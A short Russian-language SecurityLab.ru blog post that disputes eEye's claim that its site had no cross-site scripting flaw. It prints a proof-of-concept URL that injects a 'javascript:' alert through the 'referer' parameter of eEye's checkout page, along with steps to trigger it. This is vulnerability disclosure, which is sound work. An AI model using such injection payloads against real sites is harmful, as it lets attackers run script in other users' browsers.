XSS на eEye.com

Security
XSS на eEye.com
Компания eEye утверждает что на их сайте не было XSS. Собственно, а что следовало ожидать от компании, которая не способна защитить свой web стайт?

Example:
Follow the link and press the "Back" button.

www.eeye.com//~apps/shop/checkout.asp?referer=javascript: alert('www.securitylab.ru')&rnd=060816.123112.125229.323
Security
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
Ищем уязвимости в системе и новых подписчиков!

Первое — находим постоянно, второе — ждем вас

Эксплойтните кнопку подписки прямо сейчас
article-title

Валерий Марчук

Блог посвящен безопасности и жизни секлаба